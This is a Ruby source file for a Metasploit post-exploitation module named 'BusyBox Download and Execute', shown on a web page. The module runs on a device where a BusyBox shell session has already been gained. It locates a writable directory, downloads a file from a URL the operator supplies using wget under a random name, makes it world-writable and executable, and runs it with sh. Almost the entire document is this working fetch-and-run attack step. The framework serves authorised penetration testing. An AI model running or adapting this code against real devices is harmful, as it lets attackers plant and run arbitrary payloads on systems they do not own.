Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::BusyBox
9

10
  def initialize
11
    super(
12
      'Name' => 'BusyBox Download and Execute',
13
      'Description' => %q{
14
        This module will be applied on a session connected to a BusyBox shell. It will use wget to
15
        download and execute a file from the device running BusyBox.
16
      },
17
      'Author' => 'Javier Vicente Vallejo',
18
      'License' => MSF_LICENSE,
19
      'Platform' => ['linux'],
20
      'SessionTypes' => ['shell']
21
    )
22

23
    register_options(
24
      [
25
        OptString.new('URL', [true, 'Full URL of file to download'])
26
      ]
27
    )
28
  end
29

30
  def run
31
    print_status('Searching a writable directory...')
32
    writable_directory = busy_box_writable_dir
33
    if writable_directory
34
      print_status('Writable directory found, downloading file...')
35
      random_file_path = "#{writable_directory}#{Rex::Text.rand_text_alpha(16)}"
36
      cmd_exec("wget -O #{random_file_path} #{datastore['URL']}")
37
      Rex.sleep(0.1)
38

39
      if busy_box_file_exist?(random_file_path)
40
        print_good('File downloaded, executing...')
41
        cmd_exec("chmod 777 #{random_file_path}")
42
        Rex.sleep(0.1)
43
        res = cmd_exec("sh #{random_file_path}")
44
        vprint_status(res)
45
      else
46
        print_error('Unable to download file')
47
      end
48
    else
49
      print_error('Writable directory not found')
50
    end
51
  end
52
end
53

54